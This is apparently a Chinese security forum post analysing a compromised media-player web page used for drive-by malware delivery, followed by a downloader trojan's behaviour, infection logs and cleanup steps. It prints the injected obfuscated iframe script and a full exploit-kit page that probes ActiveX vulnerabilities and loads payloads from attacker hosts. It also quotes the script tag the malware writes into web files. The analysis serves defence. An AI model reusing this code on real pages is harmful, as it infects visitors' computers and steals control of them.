挂马地址:hxxp://wwwcnc.ttplayer.com/index.php 网页前半部分被挂的代码:{SCRIPT}eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\134\57\134\57\141\141\56\154\154\163\147\151\156\147\56\143\157\155\134\57\167\167\134\57\156\145\167\62\70\60\56\150\164\155\77\60\61\66\40\167\151\144\164\150\75\61\40\150\145\151\147\150\164\75\61\76\74\134\57\151\146\162\141\155\145\76\42\51");{/script}{html} 解密后为指向http:\/\/aa.llsging.com\/ww\/new280.htm?016
继续 http:\/\/aa.llsging.com\/ww\/new280.htm?016解密后指向 http://a5.llsging.com/aa/nini.htm http://a5.llsging.com/aa/gege.htm
http://a5.llsging.com/aa/nini.htm代码:
{SCRIPT LANGUAGE='JavaScript'} function ResumeError() { return true; } window.onerror = ResumeError; {/SCRIPT} {SCRIPT LANGUAGE="JavaScript"} eval("/*{SCRIPT LANGUAGE='JavaScript'} function ResumeError() { return true; } window.onerror = ResumeError; {/SCRIPT}*/ function init(){document.write()}window.onload=init;if(document.cookie.indexOf('OK')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='iepl=orer;path=/;expires='+expires.toGMTString();if(e!="[object Error]"){document.write("{script src=http:\/\/a5.llsging.com\/aa\/11.js}{\/script}")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("{script src=http:\/\/a5.llsging.com\/aa\/bb.js}{\/script}")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("{script src=http:\/\/a5.llsging.com\/aa\/ppp.js}{\/script}")}}try{var h;var obj=new ActiveXObject("BaiduBar.Tool")}catch(h){};finally{if(h!="[object Error]"){obj.DloadDS("http://down.llsging.com/bb/bd.cab","bd.exe",0)}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"){document.write("{iframe width='10' height='10' src='http://a5.llsging.com/aa/bf.html'}{/iframe}")}}}}") {/SCRIPT}
http:\/\/a5.llsging.com\/aa\/11.js MS06-014漏洞 http:\/\/a5.llsging.com\/aa\/bb.js 暴风影音漏洞 http:\/\/a5.llsging.com\/aa\/ppp.js PPStream漏洞? http://down.llsging.com/bb/bd.cab 百度toolbar
http://a5.llsging.com/aa/gege.htm不会解密 希望大家帮下忙...
最后下载的仍是一个木马下载者
由于本人才疏学浅,网页解密部分的分析可能存在错误,还请大家指教
下面是该木马下载者的简要分析 File: ntuser.com Size: 31792 bytes Modified: 2007年12月22日, 10:19:44 MD5: 5EE5CC57AAD61F73420F874433E526A5 SHA1: 24141C18ACB87CB8E54D924C2E117B8F44926598 CRC32: 605FE6B3
1.病毒运行后,释放如下副本以及文件: %systemroot%\system32\wxptdi.sys
2.释放一个批处理停止Windows 防火墙服务
3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年
4.启动一个空壳的wuauclt.exe 把%systemroot%\system32\wxptdi.sys(其实和ntuser.com是同一个文件)的代码完全注入进去
5.感染全盘的php jsp asp htm html文件 在后面写入{script language=javascript src=http://cc.18dd.net/1.js}{/script}的代码
6.wuauclt.exe执行下载木马的操作 读取http://*.com/elf_listo.txt的文件列表 下载27个木马和病毒 到c:\Program Files下面 分别命名为csrss0.exe~csrss9.exe csrssa.exe~csrsst.exe
木马感染后的sreng日志如下: 启动项目 注册表 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] {SSLDyn}{%systemroot%\SSLDyn.exE} [] {cmdbcs}{%systemroot%\cmdbcs.exe} [] {WinSysM}{%systemroot%\608769M.exe} [] {WinSysW}{%systemroot%\608769L.exe} [] {Kvsc3}{%systemroot%\Kvsc3.exE} [] {AVPSrv}{%systemroot%\AVPSrv.exE} [] {NVDispDrv}{%systemroot%\aorwpw.exe} [N/A] {DbgHlp32}{%systemroot%\DbgHlp32.exe} []
================================== 驱动程序 [RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start] {system32\DRIVERS\msconkt.sys}{N/A}(之前的comint32.sys,GD*I32.dll,bj*rl.dll,addr*help.dll木马群变种) [RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start] {system32\DRIVERS\msconkt.sys}{N/A} [PciHardDisk / PciHardDisk][Stopped/Manual Start] {\??\%systemroot%\system32\fat32.sys}{N/A}(机器狗病毒变种)
================================== 正在运行的进程 [PID: 1740][%systemroot%\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)] [%systemroot%\608769MM.DLL] [N/A, ] [%systemroot%\608769WL.DLL] [N/A, ] [%systemroot%\system32\SSLDyn.dll] [N/A, ] [%systemroot%\system32\cmdbcs.dll] [N/A, ] [%systemroot%\system32\Kvsc3.dll] [N/A, ] [%systemroot%\system32\AVPSrv.dll] [N/A, ] [%systemroot%\system32\DbgHlp32.dll] [N/A, ] [PID: 524][C:\Program Files\VMware\VMware Tools\VMwareService.exe] [VMware, Inc., 6.0.1 build-55017] [%systemroot%\system32\GDQQHXI32.dll] [N/A, ] [%systemroot%\system32\GDDTHXI32.dll] [N/A, ] [%systemroot%\system32\GDJZI32.dll] [N/A, ] [%systemroot%\system32\GDQQSGI32.dll] [N/A, ] [%systemroot%\system32\GDZYZJI32.dll] [N/A, ] [%systemroot%\system32\GDDJI32.dll] [N/A, ] [%systemroot%\system32\GDGFSJI32.dll] [N/A, ] [%systemroot%\system32\GDMSI32.dll] [N/A, ] [%systemroot%\system32\GDZXI32.dll] [N/A, ] [%systemroot%\system32\GDWDI32.dll] [N/A, ] [%systemroot%\system32\GDGJI32.dll] [N/A, ] [%systemroot%\system32\GDWLI32.dll] [N/A, ] [%systemroot%\system32\GDFYI32.dll] [N/A, ] [%systemroot%\system32\GDZYHXI32.dll] [N/A, ] [%systemroot%\system32\GDHnXaI32.dll] [N/A, ] [%systemroot%\system32\GDZHTUI32.dll] [N/A, ] [%systemroot%\system32\GDWMI32.dll] [N/A, ] [%systemroot%\system32\GDJX2I32.dll] [N/A, ]
清除办法: 下载sreng和Xdelbox(可到down.45it.com下载)
1.解压缩Xdelbox 在 添加旁边的框中 输入 %systemroot%\system32\drivers\msconkt.sys %systemroot%\system32\AVPSrv.dll %systemroot%\system32\cmdbcs.dll %systemroot%\system32\DbgHlp32.dll %systemroot%\system32\Kvsc3.dll %systemroot%\system32\LYLOADER.EXE %systemroot%\system32\LYMANGR.DLL %systemroot%\system32\MSDEG32.DLL %systemroot%\system32\NVDispDrv.dll %systemroot%\system32\REGKEY.hiv %systemroot%\system32\SSLDyn.dll %systemroot%\system32\wxptdi.sys %systemroot%\608769L.exe %systemroot%\608769M.exe %systemroot%\608769MM.DLL %systemroot%\608769WL.DLL %systemroot%\AVPSrv.exE %systemroot%\cmdbcs.exe %systemroot%\DbgHlp32.exe %systemroot%\Kvsc3.exE %systemroot%\NVDispDRV.EXE %systemroot%\SSLDyn.exE %systemroot%\system32\fat32.sys(%systemroot%为环境变量,表示你的系统文件夹安装位置,对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推) 输入完一个以后 点击旁边的添加 按钮 被添加的文件 将出现在下面的大框中 右键 点击右键菜单中的 “立即重启执行删除” 重启计算机以后 会有两个系统进入的选择的倒计时界面 第一个是你原来的windows系统 第二个是这个软件给你设定的dos系统 系统会自动选择进入第二个系统 类似dos的界面滚动完毕以后 病毒就被删除了 之后会自动重启进入正常模式
2.重启之后 打开sreng 启动项目 注册表 删除如下项目 [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] {SSLDyn}{%systemroot%\SSLDyn.exE} [] {cmdbcs}{%systemroot%\cmdbcs.exe} [] {WinSysM}{%systemroot%\608769M.exe} [] {WinSysW}{%systemroot%\608769L.exe} [] {Kvsc3}{%systemroot%\Kvsc3.exE} [] {AVPSrv}{%systemroot%\AVPSrv.exE} [] {NVDispDrv}{%systemroot%\aorwpw.exe} [N/A] {DbgHlp32}{%systemroot%\DbgHlp32.exe} []
在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”, 选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”: [RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start] {system32\DRIVERS\msconkt.sys}{N/A}(之前的comint32.sys变种) [RAS Asynchronous Media Driver / CCDECODE][Running/Auto Start] {system32\DRIVERS\msconkt.sys}{N/A} [PciHardDisk / PciHardDisk][Stopped/Manual Start] {\??\%systemroot%\system32\fat32.sys}{N/A}(机器狗病毒变种)
3.清除机器狗病毒 参考www.45its.com/Article/pcedu/Safety/200712/18681.htm 解决方法第三点即可
4.修复被感染的网页文件 推荐使用CSI的iframkill 下载地址:http://www.vaid.cn/blog/read.php?9
|